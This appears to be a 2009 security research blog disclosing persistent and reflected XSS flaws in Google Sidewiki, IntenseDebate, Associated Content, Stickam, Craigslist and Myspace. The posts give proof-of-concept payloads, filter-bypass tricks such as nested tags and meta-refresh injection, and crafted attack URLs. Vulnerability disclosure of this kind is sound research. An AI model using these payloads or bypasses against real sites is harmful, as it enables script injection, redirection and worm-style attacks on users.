This site is soon to be deprecated by http://www.johnleitch.net

Wednesday, September 30, 2009

Persistent XSS Vulnerability - Google.com

Here's a good one: Google Sidewiki has a type 2 XSS vulnerability. Upon editing an entry (and possibly when adding one, I didn't test it) an HTTP proxy such as Fiddler can be used to alter the pagetitle field.



The code replacing the pagetitle value is as follows.
<<a>a onmouseout=alert(0)>a

The a tag is stripped out, but as only one pass is performed a new a tag is created.
<a onmouseout=alert(0)>a

The result is a profile containing the arbitrary code.



http://www.google.com/profiles/108489460074237220044?hl=en#sidewiki

Friday, September 25, 2009

Persistent XSS Vulnerability - IntenseDebate.com

The profile description field of Intense Debate has a type 2 XSS vulnerability. Using it, arbitrary code can be run when the affected profile is viewed or when the mouse cursor is over the avatar present next to comments posted by the account.





<a style="position:absolute;top:-500px;left:-500px;width:9999px;height:9999px;" onmouseover="alert(0)"></a>

http://intensedebate.com/people/JohnnyCake5

http://www.woodtv.com/dpp/your_money/wall_street/Stocks_End_Low_As_Healthcare_Recovers_2887663#IDComment35942133

Saturday, September 19, 2009

Persistent XSS Vulnerability - AssociatedContent.com

Several of the fields of Associated Content profile system have persistent XSS vulnerabilities. Such a vulnerability could be used to craft a rather nasty worm.





The code shown in the screenshots is as follows:

"style="position:absolute;top:0;left:0;width:9999px;height:9999px;"onmouseover="alert(0)

http://www.associatedcontent.com/user/631547/xss_blog.html

Thursday, September 10, 2009

Leveraging Existing CSS - Stickam.com

Stickam's filters are quite strict; attempting to inject a script tag results in an internal error page. The same thing happens with a variety of other tags, any event attribute, certain CSS property values (e.g. setting position to absolute) and even many of the site's CSS IDs and classes. But the filters miss some of the ID selectors that set the element position to absolute, and this can be utilized to cover the entire page with a link.

http://www.stickam.com/onlineMembers.do?personalTags="<a id="cboxTitle"style="height:9999px;width:9999px;"href="http://cross-site-scripting.blogspot.com"</a>

Monday, September 7, 2009

Sidestepping Filters - Craigslist.org

Because the of the lack of HTML encoding, tags can be injected using the search forum search feature assuming no results are found. Testing this with H1 tags yields the expected results.



However, attempting the same thing with script results in the page being rendered only up to to the opening tag.



But by adding a single character after the closing script tag, the filter causing this behavior can be sidestepped.

http://craigslist.org/forums/?SQ=fffffffff<script>alert(0)</script>f&act=RSR&forumID=8

Friday, September 4, 2009

Exploiting The Meta Tag - Local.Myspace.com

Despite the lack of HTML encoding of data passed to the vulnerable market field, tags cannot be used as sending a less than character followed by any alphabetic character redirects the user to a presumably security related error page. But by injecting the http-equiv attribute, the vulnerable meta tag can be repurposed.

http://local.myspace.com/index.cfm?fuseaction=local.hub&dma=467&market=0;http://cross-site-scripting.blogspot.com/"http-equiv="refresh"